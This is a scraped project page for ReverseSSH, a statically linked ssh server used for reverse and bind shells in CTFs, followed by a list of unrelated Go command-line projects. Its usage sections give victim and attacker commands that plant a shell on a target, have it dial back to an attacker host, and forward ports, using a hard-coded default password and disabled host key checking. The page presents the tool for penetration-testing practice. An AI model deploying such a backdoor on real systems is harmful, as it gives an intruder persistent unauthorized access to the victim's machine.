ReverseSSH - a statically-linked ssh server with reverse shell functionality for CTFs and such

Related tags

reverse-ssh
Overview

ReverseSSH

A statically-linked ssh server with a reverse connection feature for simple yet powerful remote access. Most useful during HackTheBox challenges, CTFs or similar.

Has been developed and was extensively used during OSCP exam preparation.

Get the latest Release

Showcase

Features

Catching a reverse shell with netcat is cool, sure, but who hasn't accidentally closed a reverse shell with a keyboard interrupt due to muscle memory? Besides their fragility, such shells are also often missing convenience features such as fully interactive access, TAB-completion or history.

Instead you can go the way to simply deploy a lightweight ssh server (<1.5MB) onto the target and use additional commodities such as file transfer and port forwarding!

ReverseSSH tries to bridge the gap between initial foothold on a target and full local privilege escalation. Its main strengths are the following:

  • Fully interactive shell access (check windows caveats below)
  • File transfer via sftp
  • Local / remote / dynamic port forwarding
  • Supports Unix and Windows operating systems

Windows caveats

A fully interactive powershell on windows relies on Windows Pseudo Console ConPTY and thus requires at least Win10 Build 17763. On earlier versions it still works, but you only get a somewhat interactive, generic reverse shell.

You can still improve it for older windows versions by dropping ssh-shellhost.exe from OpenSSH for Windows in the same directory as reverse-ssh and then use flag -s ssh-shellhost.exe. This will pipe all traffic through ssh-shellhost.exe, which mimics a pty and transforms all virtual terminal codes such that windows can understand.

Requirements

Simply executing the provided binaries only relies on golang system requirements.

In short:

  • Linux: kernel version 2.6.23 and higher
  • Windows: Windows Server 2008R2 and higher or Windows 7 and higher

Compiling additionally requires the following:

  • golang version 1.15
  • optionally upx for compression (e.g. apt install upx-ucl)

Usage

reverseSSH v1.0.0-alpha  Copyright (C) 2021  Ferdinor <[email protected]>

Usage: reverse-ssh [options] [<user>@]<target>

Examples:
  Bind:
        reverse-ssh
        reverse-ssh -v -l :4444
  Reverse:
        reverse-ssh 192.168.0.1
        reverse-ssh [email protected]
        reverse-ssh -p 31337 192.168.0.1
        reverse-ssh -v -b 0 [email protected]

Options:
        -s, Shell to use for incoming connections, e.g. /bin/bash; (default: /bin/bash)
                for windows this can only be used to give a path to 'ssh-shellhost.exe' to
                enhance pre-Windows10 shells (e.g. '-s ssh-shellhost.exe' if in same directory)
        -l, Bind scenario only: listen at this address:port (default: :31337)
        -p, Reverse scenario only: ssh port at home (default: 22)
        -b, Reverse scenario only: bind to this port after dialling home (default: 8888)
        -v, Emit log output

<target>
        Optional target which enables the reverse scenario. Can be prepended with
        <user>@ to authenticate as a different user than 'reverse' while dialling home.

Credentials:
        Accepting all incoming connections from any user with either of the following:
         * Password "letmeinbrudipls"
         * PubKey   "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIKlbJwr+ueQ0gojy4QWr2sUWcNC/Y9eV9RdY3PLO7Bk/ Brudi"

Once reverse-ssh is running, you can connect with any username and the default password letmeinbrudipls, the ssh key or whatever you specified during compilation. After all, it is just an ssh server:

# Simple, interactive shell access
$ssh -p <RPORT> <RHOST>

# Full-fledged file transfers
$sftp -P <RPORT> <RHOST>

# Dynamic port forwarding as SOCKS proxy
$ssh -p <RPORT> -D 9050 <RHOST>

For even more convenience, add the following to your ~/.ssh/config, copy the ssh private key to ~/.ssh/ and simply call ssh target or sftp target afterwards:

Host target
        Hostname 127.0.0.1
        Port 8888
        IdentityFile ~/.ssh/id_reverse-ssh
        IdentitiesOnly yes
        StrictHostKeyChecking no
        UserKnownHostsFile /dev/null

Simple bind shell scenario

# Victim
$./reverse-ssh

# Attacker (default password: letmeinbrudipls)
$ssh -p 31337 <LHOST>

Simple reverse shell scenario

# On attacker (get ready to catch the incoming request;
# can be omitted if you already have an ssh daemon running, e.g. OpenSSH)
attacker$./reverse-ssh -l :<LPORT>

# On victim
victim$./reverse-ssh -p <LPORT> <LHOST>
# or in case of an ssh daemon listening at port 22 with user/pass authentication
victim$./reverse-ssh <USER>@<LHOST>

# On attacker (default password: letmeinbrudipls)
attacker$ssh -p 8888 127.0.0.1
# or with ssh config from above
attacker$ssh target

In the end it's plain ssh, so you could catch the remote port forwarding call coming from the victim's machine with your openssh daemon listening on port 22. Just prepend @ and provide the password once asked to do so. Dialling home currently is password only, because I didn't feel like baking a private key in there as well yet...

Build instructions

Make sure to install the above requirements such as golang in a matching version and set it up correctly. Afterwards, you can compile with make, which will create static binaries in bin. Use make compressed to pack the binaries with upx to further reduce their size.

$make

# or to additionally created binaries packed with upx
$make compressed

You can also specify a different default shell (RS_SHELL), a personalized password (RS_PASS) or an authorized key (RS_PUB) when compiling:

$ssh-keygen -t ed25519 -f id_reverse-ssh

$RS_SHELL="/bin/sh" RS_PASS="secret" RS_PUB="$(cat id_reverse-ssh.pub)" make compressed

Contribute

Is a mind-blowing feature missing? Anything not working as intended?

Create an issue or pull request!

Issues
Upterm is an open-source solution for sharing terminal sessions instantly over the public internet via secure tunnels.

Upterm is an open-source solution for sharing terminal sessions instantly over the public internet via secure tunnels.

Owen Ou 309 Jul 23, 2021
:cherry_blossom: A command-line fuzzy finder

fzf is a general-purpose command-line fuzzy finder. It's an interactive Unix filter for command-line that can be used with any list; files, command hi

Junegunn Choi 38k Jul 25, 2021
Tool for shell commands execution, visualization and alerting. Configured with a simple YAML file.

Sampler. Visualization for any shell command. Sampler is a tool for shell commands execution, visualization and alerting. Configured with a simple YAM

Alexander Lukyanchikov 9k Jul 26, 2021
A Mighty CLI for AWS

awless is a powerful, innovative and small surface command line interface (CLI) to manage Amazon Web Services. Twitter | Wiki | Changelog Why awless a

WALLIX 4.8k Jul 25, 2021
A small CLI tool to check connection from a local machine to a remote target in various protocols.

CHK chk is a small CLI tool to check connection from a local machine to a remote target in various protocols.

null 26 Apr 22, 2021
Command Line Interface for Terraform Enterprise/Cloud ( tecli )

In a world where everything is Terraform, teams use Terraform Cloud API to manage their workloads. TECLI increases teams productivity by facilitating such interaction and by providing easy commands that can be executed on a terminal or on CI/CD systems.

Amazon Web Services - Labs 187 Jul 20, 2021
📡 ssh into browser tab.

tabssh idk Uses TabFS and gilderlabs/ssh. Set your TabFS mount path in tabssh.go. $ go run tabssh.go and $ ssh -o StrictHostKeyChecking=no localhost

Omar Rizwan 55 Jul 16, 2021
Bucket-ssh. A fuzzy ssh manager for managing and categorizing ssh connections.

Bssh is an ssh bucket for categorizing and automating ssh connections. Also, with parallel command execution and connection checks(pings) over categories (namespaces).

Furkan Aksoy 11 Jul 11, 2021
minectl 🗺 is a cli for creating Minecraft (java or bedrock) server on different cloud provider.

minectl ?? minectl️️ is a cli for creating Minecraft (java or bedrock) server on different cloud provider. It is a private side project of me, to lear

Engin Diri 17 Jul 20, 2021
Go (golang) package with 70+ configurable terminal spinner/progress indicators.

Spinner spinner is a simple package to add a spinner / progress indicator to any terminal application. Examples can be found below as well as full exa

Brian Downs 1.5k Jul 21, 2021
Soren L. Hansen 1.2k Jul 19, 2021
Go Library to Execute Commands Over SSH at Scale

Go library to handle tens of thousands SSH connections and execute the command(s) with higher-level API for building network device / server automation.

Yahoo 722 Jul 15, 2021
Share your terminal as a web application

GoTTY - Share your terminal as a web application GoTTY is a simple command line tool that turns your CLI tools into web applications. Installation Dow

Iwasaki Yudai 15.6k Jul 25, 2021
self-aware Golang profile dumper[beta]

holmes WARNING : holmes is under heavy development now, so API will make breaking change during dev. If you want to use it in production, please wait

MOSN 381 Jul 21, 2021